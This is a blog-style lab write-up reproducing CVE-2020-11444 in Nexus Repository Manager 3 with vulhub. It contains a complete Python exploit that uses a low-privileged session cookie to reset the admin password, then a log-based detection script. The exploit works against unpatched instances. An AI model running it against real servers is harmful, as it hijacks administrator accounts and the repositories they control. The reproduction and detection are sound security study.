Nexus Repository Manager 3 privilege escalation vulnerability: unauthorized admin password change (CVE-2020-11444)

Statement

study hard and make progress every day

Vulnerability description

This vulnerability has essentially the same affected versions and impact as CVE-2020-10199 and CVE-2020-10204, which were disclosed about a month earlier. After those two were patched, CVE-2020-11444 was disclosed in turn against the patched release.

It is a privilege escalation in Nexus 3: the admin user's password can be changed without authorization. An attacker who can log in as a low-privileged user obtains that user's session ID and uses it to call the change-password endpoint for the admin user, which the server should have refused.

Affected versions

Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 (fixed in 3.21.2)

Reproduction process

Version 3.21.1 is used here

Using vulhub

cd /app/vulhub-master/nexus/CVE-2020-10199

Start it with Docker Compose

docker-compose up -d

Nexus takes a while to start. Once it is up, the web UI is reachable at the following address.

http://your-ip:8081

The vulhub environment ships with the default credentials admin:admin. Log in with them first (Sign In, top right) and complete the initial setup wizard, which includes changing the admin password.

A low-privileged user must also exist for the test; the one used below is named user and has only an ordinary (non-administrative) role. Create it under Security > Users if it does not exist yet.

Once that is done, log in as the low-privileged user, refresh any page while logged in, and intercept the request (with Burp or the browser's developer tools) to copy the current user's Cookie header, which carries the NXSESSIONID and NX-ANTI-CSRF-TOKEN values.

That session is all the exploit needs: the change-password endpoint for the admin user accepts the low-privileged user's NXSESSIONID, so user (an ordinary user) can set a new password for admin (the administrator) without holding any administrative right.

The exploit script below carries a placeholder NXSESSIONID; replace it with the one captured from the low-privileged user (the session appears to expire after about 10 minutes, so capture it again if the request starts failing).

The NX-ANTI-CSRF-TOKEN value and the IP address used for the Origin header are the ones from the author's environment and can be replaced with your own; the token only has to be the same in the header and in the cookie.

#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests

if len(sys.argv) != 3:
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                          +')
    print('+      CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password)                         +')
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <password>                                                      +')
    print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 123456                                      +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                         +')
    print('+-----------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1].rstrip('/')
password = sys.argv[2]   # new password to set for the admin user
vuln_url = url + "/service/rest/beta/security/users/admin/change-password"

# Replace with the NXSESSIONID captured from the low-privileged user's browser session.
session_id = "f24dc2f7-7db6-4c04-8b46-52dba909579a"
# Nexus checks the NX-ANTI-CSRF-TOKEN header against the cookie of the same name,
# so the script sends the same value in both places.
csrf_token = "0.4256948739162416"

headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    'NX-ANTI-CSRF-TOKEN': csrf_token,
    'Content-Type': "text/plain",   # the endpoint takes the new password as a plain-text body
    'Origin': url,
    'Cookie': "NX-ANTI-CSRF-TOKEN=%s; NXSESSIONID=%s" % (csrf_token, session_id),
}
data = password

r = requests.request('PUT', url=vuln_url, headers=headers, data=data)
if r.status_code == 204:
    print("[+] Password Change Success")
    print("[+] " + url)
    print("[+] Username:admin Password:" + password)
else:
    print("[-] SessionID Not available (HTTP %d)" % r.status_code)
    print("[-] Target Not CVE-2020-11444 Vuln Good Luck")
    sys.exit(0)

Run it

python3 cve-2020-11444_exp.py http://192.168.239.129:8081 123456

As expected, the old admin password no longer works: admin now logs in with the password set by the script.
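On the defender's side, the same request is easy to spot in Nexus's request.log. The check below is an added example (not part of the original post or of the exphub script). It assumes the default Nexus 3 request log layout, %clientHost %l %user [%date] "%requestURL" %statusCode ..., and the sample lines are constructed for the test rather than taken from a real deployment. It flags any PUT to the change-password endpoint where the authenticated user differs from the user named in the path, and includes a small numeric version check against the affected range given above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed default Nexus 3 request.log layout (logback-access.xml):
#   %clientHost %l %user [%date] "%requestURL" %statusCode %header{Content-Length} %bytesSent %elapsedTime "%header{User-Agent}" [%thread]
# Only the fields up to the status code are needed here.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# The endpoint abused by CVE-2020-11444 (beta API on 3.21.x; v1 on later releases).
CHANGE_PW_RE = re.compile(
    r'^/service/rest/(?:beta|v1)/security/users/(?P<target>[^/?]+)/change-password/?$'
)


@dataclass
class Finding:
    ts: str
    ip: str
    actor: str      # authenticated user that sent the request
    target: str     # user whose password was changed
    status: int
    severity: str   # "high" when the change succeeded, "medium" otherwise
    reason: str


def parse_version(v: str) -> tuple:
    """'3.21.1' -> (3, 21, 1); numeric tuples avoid the '3.21.10' < '3.21.2' string-compare pitfall."""
    return tuple(int(p) for p in v.split("."))


def is_affected_version(version: str) -> bool:
    """True for Nexus 3.x OSS/Pro up to and including 3.21.1 (fixed in 3.21.2)."""
    parts = parse_version(version)
    return parts[0] == 3 and parts <= (3, 21, 1)


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for a cross-user password change request, else None."""
    m = LINE_RE.match(line)
    if not m or m.group("method") != "PUT":
        return None
    pm = CHANGE_PW_RE.match(m.group("path"))
    if not pm:
        return None
    actor, target, status = m.group("user"), pm.group("target"), int(m.group("status"))
    if actor == target:
        return None   # a user changing their own password is ordinary self-service
    if status == 204:
        sev, why = "high", "cross-user password change succeeded (CVE-2020-11444 pattern)"
    elif status in (401, 403):
        sev, why = "medium", "cross-user password change refused (attempt)"
    else:
        sev, why = "medium", "cross-user password change with unexpected status"
    return Finding(m.group("ts"), m.group("ip"), actor, target, status, sev, why)


def audit(lines) -> List[Finding]:
    """Run classify() over an iterable of request.log lines and keep the hits."""
    return [f for f in (classify(line) for line in lines) if f is not None]


# Constructed sample lines (not from a real deployment), modelled on the layout above.
SAMPLE_LOG = [
    '192.168.239.1 - user [03/May/2022:09:54:50 +0300] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 204 6 0 31 "python-requests/2.25.1" [qtp123-45]',
    '192.168.239.1 - admin [03/May/2022:09:50:12 +0300] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 204 8 0 40 "Mozilla/5.0" [qtp123-46]',
    '10.0.0.7 - user [03/May/2022:10:01:03 +0300] "PUT /service/rest/v1/security/users/admin/change-password HTTP/1.1" 403 6 0 12 "curl/7.68.0" [qtp123-47]',
    '10.0.0.7 - user [03/May/2022:10:01:05 +0300] "GET /service/rest/v1/status HTTP/1.1" 200 - 12 3 "curl/7.68.0" [qtp123-48]',
    'not a request log line',
]

if __name__ == "__main__":
    print("3.21.1 affected:", is_affected_version("3.21.1"))
    for f in audit(SAMPLE_LOG):
        print(f"[{f.severity}] {f.ts} {f.ip} {f.actor} -> {f.target} HTTP {f.status}: {f.reason}")
```

A successful cross-user change (HTTP 204 from a non-admin actor against the admin path) is the exploitation signal; a refused one is still worth alerting on, since it shows someone probing for the bug with a valid low-privileged session.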

Shut down the containers when you are done

docker-compose down

Common Docker Compose commands

Build and start the environment (after entering the specific vulhub directory)

docker-compose build
docker-compose up -d

List containers (the first column is the container ID)

docker ps -a

Open a shell in a container (using the ID from the previous step)

docker exec -it ID /bin/bash

Shut down the environment (do this after each session)

docker-compose down

Tags: Web Security Information Security security hole

Posted by rachel2004 on Tue, 03 May 2022 09:54:50 +0300